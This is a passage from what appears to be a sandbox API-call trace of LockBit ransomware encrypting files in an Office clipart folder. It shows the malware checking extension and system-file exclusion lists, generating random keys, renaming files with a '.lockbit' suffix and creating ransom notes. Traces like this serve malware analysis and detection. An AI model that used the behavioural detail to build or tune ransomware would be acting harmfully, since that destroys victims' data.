lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105600.WMF") returned 1 [0139.041] lstrcmpiW (lpString1="ntldr", lpString2="J0105600.WMF") returned 1 [0139.041] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105600.WMF") returned 1 [0139.041] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105600.WMF") returned -1 [0139.041] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105600.WMF") returned -1 [0139.041] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105600.WMF") returned 1 [0139.041] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105600.WMF") returned -1 [0139.041] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.041] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF") returned=".WMF" [0139.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.041] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.041] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.042] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.042] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.lockbit") returned 72 [0139.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.043] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.043] malloc (_Size=0x40068) returned 0x3df0008 [0139.043] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8680) returned 1 [0139.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.044] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.048] malloc (_Size=0xa6) returned 0x77d7a8 [0139.048] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.049] free (_Block=0x77d7a8) [0139.050] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105600.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.050] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.050] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x287c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105638.WMF", cAlternateFileName="")) returned 1 [0139.050] lstrcmpiW (lpString1=".", lpString2="J0105638.WMF") returned -1 [0139.050] lstrcmpiW (lpString1="..", lpString2="J0105638.WMF") returned -1 [0139.050] PathFindExtensionW (pszPath="J0105638.WMF") returned=".WMF" [0139.050] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.050] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.051] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105638.WMF") returned 1 [0139.051] lstrcmpiW (lpString1="ntldr", lpString2="J0105638.WMF") returned 1 [0139.051] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105638.WMF") returned 1 [0139.051] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105638.WMF") returned -1 [0139.051] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105638.WMF") returned -1 [0139.051] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105638.WMF") returned 1 [0139.051] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105638.WMF") returned -1 [0139.051] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.051] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF") returned=".WMF" [0139.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.052] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.052] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.052] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.lockbit") returned 72 [0139.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.053] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.053] malloc (_Size=0x40068) returned 0x3df0008 [0139.053] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10364) returned 1 [0139.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.054] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.058] malloc (_Size=0xa6) returned 0x77d7a8 [0139.058] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.059] free (_Block=0x77d7a8) [0139.059] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105638.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.059] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.059] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x35f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105710.WMF", cAlternateFileName="")) returned 1 [0139.059] lstrcmpiW (lpString1=".", lpString2="J0105710.WMF") returned -1 [0139.059] lstrcmpiW (lpString1="..", lpString2="J0105710.WMF") returned -1 [0139.059] PathFindExtensionW (pszPath="J0105710.WMF") returned=".WMF" [0139.059] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.059] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.060] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.060] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105710.WMF") returned 1 [0139.061] lstrcmpiW (lpString1="ntldr", lpString2="J0105710.WMF") returned 1 [0139.061] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105710.WMF") returned 1 [0139.061] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105710.WMF") returned -1 [0139.061] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105710.WMF") returned -1 [0139.061] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105710.WMF") returned 1 [0139.061] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105710.WMF") returned -1 [0139.061] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.061] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF") returned=".WMF" [0139.061] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.061] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.061] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.062] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.062] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.lockbit") returned 72 [0139.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.063] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.063] malloc (_Size=0x40068) returned 0x3df0008 [0139.063] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13808) returned 1 [0139.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.064] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.068] malloc (_Size=0xa6) returned 0x77d7a8 [0139.068] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.069] free (_Block=0x77d7a8) [0139.069] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105710.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.069] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), 